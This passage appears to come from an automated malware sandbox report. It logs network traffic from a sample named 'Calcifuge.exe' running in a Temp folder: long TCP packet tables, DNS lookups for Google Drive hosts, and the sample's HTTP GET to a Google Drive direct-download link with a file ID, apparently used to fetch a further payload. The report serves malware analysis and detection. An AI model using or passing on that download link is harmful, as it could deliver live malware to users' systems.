                                                                                              Jan 11, 2025 03:53:17.451409101 CET44353691172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:17.577194929 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:17.577249050 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:17.577416897 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:17.577826977 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:17.577840090 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.227272034 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.227360964 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.228379965 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.228429079 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.230741024 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.230756044 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.231122971 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.231295109 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.231614113 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.275333881 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.625868082 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.625950098 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.625981092 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.626030922 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.626156092 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.626203060 CET44353700172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.626252890 CET53700443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:18.635272980 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:18.635351896 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:18.635426998 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:18.635658979 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:18.635677099 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.261919022 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.262068033 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.262770891 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.262784004 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.262972116 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.262978077 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.708379984 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.708448887 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.708542109 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.708587885 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.708587885 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.708587885 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.709316015 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.709372997 CET44353708172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.709403992 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.709441900 CET53708443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:19.834541082 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:19.834589958 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:19.834733963 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:19.835218906 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:19.835232019 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.555799007 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.555993080 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.558234930 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.558389902 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.560615063 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.560631037 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.561074972 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.561134100 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.561572075 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.603337049 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.943773031 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.943890095 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.943922043 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.943968058 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.944022894 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.944072962 CET44353716172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.944132090 CET53716443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:20.958147049 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:20.958210945 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:20.958296061 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:20.958616018 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:20.958627939 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:21.610687971 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:21.610845089 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:21.611538887 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:21.611551046 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:21.611768961 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:21.611773968 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.059289932 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.059427977 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:22.059494019 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.059554100 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:22.059571028 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.059624910 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:22.059689045 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.059739113 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:22.060525894 CET53722443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:22.060543060 CET44353722172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.194086075 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:22.194170952 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.194346905 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:22.194710016 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:22.194726944 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.835906982 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.836097002 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:22.837002039 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.837070942 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:22.839349031 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:22.839368105 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.839761972 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:22.839819908 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:22.840312958 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:22.883353949 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:23.220314980 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:23.220675945 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:23.220815897 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:23.220851898 CET44353727172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:23.220899105 CET53727443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:23.233268976 CET53733443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:35.942895889 CET53778443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:35.942928076 CET44353778172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:35.942945957 CET53778443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:35.942982912 CET44353778172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:35.942984104 CET53778443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:35.943027020 CET53778443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:35.943821907 CET53778443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:35.943837881 CET44353778172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:36.069066048 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:36.069117069 CET44353779172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:36.069211960 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:36.069601059 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:36.069617987 CET44353779172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:36.724261045 CET44353779172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:36.724319935 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:36.725044966 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:36.725054026 CET44353779172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:36.725258112 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:36.725260973 CET44353779172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:37.109483004 CET44353779172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:37.109631062 CET44353779172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:37.109791994 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:37.109791994 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:37.109791994 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:37.109827042 CET53779443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:37.133025885 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:37.133117914 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:37.133213997 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:37.133666039 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:37.133694887 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:37.766401052 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:37.766479969 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:37.767090082 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:37.767108917 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:37.767287970 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:37.767332077 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.221530914 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.221627951 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:38.221698999 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.221733093 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.221762896 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:38.221790075 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.221842051 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:38.221842051 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:38.221863985 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.221898079 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.221911907 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:38.221951962 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:38.222328901 CET53780443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:38.222362041 CET44353780172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.350385904 CET53781443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:38.350454092 CET44353781172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:38.350570917 CET53781443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:38.350888014 CET53781443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:38.350903988 CET44353781172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:39.005490065 CET44353781172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:39.007524014 CET53781443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:39.008157015 CET53781443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:39.008172035 CET44353781172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:39.008372068 CET53781443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:39.008378983 CET44353781172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:39.388187885 CET44353781172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:39.388573885 CET44353781172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:39.388729095 CET53781443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:39.388892889 CET53781443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:39.388920069 CET44353781172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:39.401737928 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:39.401843071 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:39.402653933 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:39.402976990 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:39.403012037 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.036168098 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.036247015 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.043720961 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.043776989 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.043957949 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.043970108 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.478842974 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.479001999 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.479022980 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.479195118 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.479249001 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.479294062 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.479301929 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.479321003 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.479341984 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.479371071 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.480016947 CET53782443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:40.480030060 CET44353782172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.600970984 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:40.601011038 CET44353783172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:40.601104021 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:40.601381063 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:40.601392984 CET44353783172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:41.262955904 CET44353783172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:41.263041019 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:41.266050100 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:41.266057968 CET44353783172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:41.266387939 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:41.266393900 CET44353783172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:41.646009922 CET44353783172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:41.646120071 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:41.646363020 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:41.646394968 CET44353783172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:41.646449089 CET53783443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:41.659372091 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:41.659410954 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:41.659485102 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:41.659852028 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:41.659861088 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.306715965 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.306803942 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:42.307394028 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:42.307401896 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.307571888 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:42.307576895 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.753328085 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.753381014 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.753443003 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.753442049 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:42.753468990 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:42.753492117 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:42.754231930 CET53784443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:42.754249096 CET44353784172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.881527901 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:42.881583929 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:42.881676912 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:42.882020950 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:42.882035971 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.525445938 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.525546074 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.526097059 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.526159048 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.528217077 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.528234005 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.528429031 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.528476954 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.529015064 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.571325064 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.920000076 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.920073032 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.920092106 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.920133114 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.920234919 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.920260906 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.920300007 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.929326057 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:43.929363012 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.929424047 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:43.929672003 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:43.929681063 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.557961941 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.558028936 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.558581114 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.558588028 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.558778048 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.558783054 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996385098 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996452093 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996478081 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.996498108 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996520042 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996520042 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.996556044 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.996596098 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.997292995 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.997308969 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.116138935 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.116182089 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.116318941 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.116695881 CET53787443192.168.2.4172.217.16.206
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 03:52:29.542167902 CET | 54665 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 03:52:29.549182892 CET | 53 | 54665 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 03:52:30.619851112 CET | 61269 | 53 | 192.168.2.4 | 1.1.1.1
Jan 11, 2025 03:52:30.627826929 CET | 53 | 61269 | 1.1.1.1 | 192.168.2.4
Jan 11, 2025 03:52:31.949315071 CET | 53 | 52160 | 162.159.36.2 | 192.168.2.4
Jan 11, 2025 03:52:32.471029997 CET | 53 | 54999 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 03:52:29.542167902 CET | 192.168.2.4 | 1.1.1.1 | 0x374 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:52:30.619851112 CET | 192.168.2.4 | 1.1.1.1 | 0x2e7a | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 03:52:29.549182892 CET | 1.1.1.1 | 192.168.2.4 | 0x374 | No error (0) | drive.google.com |  | 172.217.16.206 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:52:30.627826929 CET | 1.1.1.1 | 192.168.2.4 | 0x2e7a | No error (0) | drive.usercontent.google.com |  | 172.217.16.129 | A (IP address) | IN (0x0001) | false
                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:52:30 UTC | 216 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
2025-01-11 02:52:30 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:30 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-IrzXGIl8lGAW5rdaMEF0wA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
